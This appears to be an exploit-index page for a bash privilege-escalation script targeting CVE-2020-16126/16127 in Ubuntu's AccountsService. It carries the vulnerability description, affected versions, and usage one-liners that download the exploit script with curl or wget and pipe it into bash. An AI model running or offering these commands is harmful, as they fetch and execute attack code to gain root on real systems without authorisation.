CVE-2020-16126 PoC — accountsservice drops ruid, allows unprivileged users to send it signals

Source

https://github.com/zev3n/Ubuntu-Gnome-privilege-escalation

Associated Vulnerability

Title:accountsservice drops ruid, allows unprivileged users to send it signals (CVE-2020-16126)
Description:An Ubuntu-specific modification to AccountsService in versions before 0.6.55-0ubuntu13.2, among other earlier versions, improperly dropped the ruid, allowing untrusted users to send signals to AccountService, thus stopping it from handling D-Bus messages in a timely fashion.

Description

A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.Ubuntu 16.04-20.04 LTS本地提权漏洞利用脚本。要求拥有Gnome图形化环境。

Readme

# Ubuntu-Gnome-privilege-escalation
A bash script exploit of [CVE-2020-16126/CVE-2020-16127] to achieve privilege escalation.

一个可以方便实现Ubuntu本地提权的bash脚本（利用CVE-2020-16126/CVE-2020-16127漏洞），要求处于Gnome环境。

## Affect version
Ubuntu 20.04.1\20.10\18.04\16.04 LTS and so on

## Usage
`curl https://raw.githubusercontent.com/zev3n/Ubuntu-Gnome-privilege-escalation/main/CVE-2020-1612%5B6_7%5D_exploit.sh | bash`

or (If you have No permissions to install 'curl',you could try...)

`wget -q -O - --no-check-certificate https://raw.githubusercontent.com/zev3n/Ubuntu-Gnome-privilege-escalation/main/CVE-2020-1612%5B6_7%5D_exploit.sh | bash`

## Demonstration
TODO

## Reference
https://securitylab.github.com/advisories/GHSL-2020-187-accountsservice-drop-privs-DOS

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!